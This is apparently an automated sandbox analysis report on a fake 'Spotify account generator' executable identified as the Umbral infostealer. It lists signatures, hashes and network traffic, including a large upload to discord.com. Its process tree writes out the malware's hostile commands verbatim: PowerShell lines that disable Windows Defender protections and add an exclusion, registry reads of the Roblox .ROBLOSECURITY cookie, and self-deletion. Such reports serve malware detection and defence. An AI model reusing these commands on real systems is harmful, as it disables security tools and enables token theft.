Analysis

  • max time kernel
    18s
  • max time network
    19s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240709-en
  • resource tags

    arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    25-07-2024 02:26

General

  • Target

    DD Spotify Acc Gen.exe

  • Size

    296KB

  • MD5

    c4cf132278a366635533a2734901aa95

  • SHA1

    06ea6b94f8accb59c3115c67208a1116a12a7f1e

  • SHA256

    382f9d13e5a5945980c767ec1d98732d971a4e07bdb9ed1950d6c455edbb203a

  • SHA512

    d6f4343892a266db8b62892d0c8eef5e63492f49e237d704cf2c5237fe5249f948dbbc8471ae2db00a862af9d7658c6286a72a0f3134786dae82d5fad72eb120

  • SSDEEP

    6144:dloZM+rIkd8g+EtXHkv/iD4PaIWVjgULYyD1Ac5eIb8e1mWiQ:/oZVL+EP8PaIWVjgULYyD1Ac5n0

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\DD Spotify Acc Gen.exe
    "C:\Users\Admin\AppData\Local\Temp\DD Spotify Acc Gen.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3332
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2920
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\DD Spotify Acc Gen.exe"
      2⤵
      • Views/modifies file attributes
      PID:2028
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\DD Spotify Acc Gen.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3600
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2320
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3168
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:444
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1568
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:5092
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:1800
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:2752
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:248
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\DD Spotify Acc Gen.exe" && pause
          2⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:4440
          • C:\Windows\system32\PING.EXE
            ping localhost
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2880

      Network

      • flag-us
        DNS
        gstatic.com
        DD Spotify Acc Gen.exe
        Remote address:
        8.8.8.8:53
        Request
        gstatic.com
        IN A
        Response
        gstatic.com
        IN A
        216.58.201.99
      • flag-us
        DNS
        ip-api.com
        DD Spotify Acc Gen.exe
        Remote address:
        8.8.8.8:53
        Request
        ip-api.com
        IN A
        Response
        ip-api.com
        IN A
        208.95.112.1
      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        DD Spotify Acc Gen.exe
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
        Response
        8.8.8.8.in-addr.arpa
        IN PTR
        dnsgoogle
      • flag-us
        DNS
        1.112.95.208.in-addr.arpa
        DD Spotify Acc Gen.exe
        Remote address:
        8.8.8.8:53
        Request
        1.112.95.208.in-addr.arpa
        IN PTR
        Response
        1.112.95.208.in-addr.arpa
        IN PTR
        ip-apicom
      • flag-us
        DNS
        1.112.95.208.in-addr.arpa
        DD Spotify Acc Gen.exe
        Remote address:
        8.8.8.8:53
        Request
        1.112.95.208.in-addr.arpa
        IN PTR
      • flag-us
        GET
        http://ip-api.com/line/?fields=hosting
        DD Spotify Acc Gen.exe
        Remote address:
        208.95.112.1:80
        Request
        GET /line/?fields=hosting HTTP/1.1
        Host: ip-api.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Thu, 25 Jul 2024 02:29:50 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 6
        Access-Control-Allow-Origin: *
        X-Ttl: 60
        X-Rl: 44
      • flag-us
        DNS
        99.201.58.216.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        99.201.58.216.in-addr.arpa
        IN PTR
        Response
        99.201.58.216.in-addr.arpa
        IN PTR
        prg03s02-in-f31e100net
        99.201.58.216.in-addr.arpa
        IN PTR
        prg03s02-in-f99�G
        99.201.58.216.in-addr.arpa
        IN PTR
        lhr48s48-in-f3�G
      • flag-us
        DNS
        discord.com
        Remote address:
        8.8.8.8:53
        Request
        discord.com
        IN A
        Response
        discord.com
        IN A
        162.159.128.233
        discord.com
        IN A
        162.159.136.232
        discord.com
        IN A
        162.159.138.232
        discord.com
        IN A
        162.159.135.232
        discord.com
        IN A
        162.159.137.232
      • flag-us
        DNS
        233.128.159.162.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        233.128.159.162.in-addr.arpa
        IN PTR
        Response
      • flag-us
        GET
        http://ip-api.com/json/?fields=225545
        DD Spotify Acc Gen.exe
        Remote address:
        208.95.112.1:80
        Request
        GET /json/?fields=225545 HTTP/1.1
        Host: ip-api.com
        Response
        HTTP/1.1 200 OK
        Date: Thu, 25 Jul 2024 02:29:54 GMT
        Content-Type: application/json; charset=utf-8
        Content-Length: 161
        Access-Control-Allow-Origin: *
        X-Ttl: 60
        X-Rl: 44
      • 216.58.201.99:443
        gstatic.com
        tls
        DD Spotify Acc Gen.exe
        803 B
        5.3kB
        8
        8
      • 208.95.112.1:80
        http://ip-api.com/line/?fields=hosting
        http
        DD Spotify Acc Gen.exe
        362 B
        482 B
        6
        3

        HTTP Request

        GET http://ip-api.com/line/?fields=hosting

        HTTP Response

        200
      • 208.95.112.1:80
        http://ip-api.com/json/?fields=225545
        http
        DD Spotify Acc Gen.exe
        377 B
        550 B
        7
        5

        HTTP Request

        GET http://ip-api.com/json/?fields=225545

        HTTP Response

        200
      • 162.159.128.233:443
        discord.com
        tls
        DD Spotify Acc Gen.exe
        569.7kB
        21.1kB
        425
        274
      • 8.8.8.8:53
        gstatic.com
        dns
        DD Spotify Acc Gen.exe
        321 B
        330 B
        5
        4

        DNS Request

        gstatic.com

        DNS Response

        216.58.201.99

        DNS Request

        ip-api.com

        DNS Response

        208.95.112.1

        DNS Request

        8.8.8.8.in-addr.arpa

        DNS Request

        1.112.95.208.in-addr.arpa

        DNS Request

        1.112.95.208.in-addr.arpa

      • 8.8.8.8:53
        99.201.58.216.in-addr.arpa
        dns
        203 B
        442 B
        3
        3

        DNS Request

        99.201.58.216.in-addr.arpa

        DNS Request

        discord.com

        DNS Response

        162.159.128.233
        162.159.136.232
        162.159.138.232
        162.159.135.232
        162.159.137.232

        DNS Request

        233.128.159.162.in-addr.arpa

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        627073ee3ca9676911bee35548eff2b8

        SHA1

        4c4b68c65e2cab9864b51167d710aa29ebdcff2e

        SHA256

        85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

        SHA512

        3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        1a9fa92a4f2e2ec9e244d43a6a4f8fb9

        SHA1

        9910190edfaccece1dfcc1d92e357772f5dae8f7

        SHA256

        0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

        SHA512

        5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        948B

        MD5

        45741c307af2576c6437c5fdb24ef9ce

        SHA1

        a6ba7a7705db14ac29a18a98dd7deb4cc759c3bf

        SHA256

        7887859f7179e194ff9b78f8d8fa3830790110a01597f21ff48c84cd935e49d2

        SHA512

        39fdc5931563cbf826e8b643b5f0dcdf45bb6f95a8eeb460499257ca41b3dbee4c692eaacc3fd33bddf4b6ff0c828981ed7e9cd080007bbb9f0b28e7d0d66941

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        0ac871344dc49ae49f13f0f88acb4868

        SHA1

        5a073862375c7e79255bb0eab32c635b57a77f98

        SHA256

        688f15b59a784f6f4c62554f00b5d0840d1489cef989c18126c70dfee0806d37

        SHA512

        ace5c50303bd27998607cf34ac4322bcf5edfbd19bbb24309acf4d037b6f3f7636c7c14b6ac0b924114e036252d3a1b998951c7068f41548728fa5d92f5f9006

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        c321dfee531730b7e0b81470b947da3f

        SHA1

        0488401f4fc03bcdab19eeff194ff12f4439e1cb

        SHA256

        6d7da148fe930cf085b5369427eb24e66844d7f00fcc197f056e0763c7a76117

        SHA512

        eee78a9529b1d89631ac8dbaef716eba95166d8c465a2c075bf89d28fab4c25a48c4d29d7f19ab0249b245bf45fac63214b092aaef9b3a09b4f8e6cfa85a076a

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ntf3muj5.1pc.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/3332-67-0x000001757A960000-0x000001757A96A000-memory.dmp

        Filesize

        40KB

      • memory/3332-33-0x000001757B4C0000-0x000001757B4DE000-memory.dmp

        Filesize

        120KB

      • memory/3332-85-0x00007FFE4C790000-0x00007FFE4D252000-memory.dmp

        Filesize

        10.8MB

      • memory/3332-68-0x000001757B4E0000-0x000001757B4F2000-memory.dmp

        Filesize

        72KB

      • memory/3332-2-0x00007FFE4C790000-0x00007FFE4D252000-memory.dmp

        Filesize

        10.8MB

      • memory/3332-31-0x000001757B310000-0x000001757B386000-memory.dmp

        Filesize

        472KB

      • memory/3332-32-0x000001757A980000-0x000001757A9D0000-memory.dmp

        Filesize

        320KB

      • memory/3332-1-0x00007FFE4C793000-0x00007FFE4C795000-memory.dmp

        Filesize

        8KB

      • memory/3332-0-0x0000017578C40000-0x0000017578C90000-memory.dmp

        Filesize

        320KB

      • memory/3600-14-0x00007FFE4C790000-0x00007FFE4D252000-memory.dmp

        Filesize

        10.8MB

      • memory/3600-13-0x00007FFE4C790000-0x00007FFE4D252000-memory.dmp

        Filesize

        10.8MB

      • memory/3600-11-0x000002F5D38C0000-0x000002F5D38E2000-memory.dmp

        Filesize

        136KB

      • memory/3600-12-0x00007FFE4C790000-0x00007FFE4D252000-memory.dmp

        Filesize

        10.8MB

      • memory/3600-17-0x00007FFE4C790000-0x00007FFE4D252000-memory.dmp

        Filesize

        10.8MB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.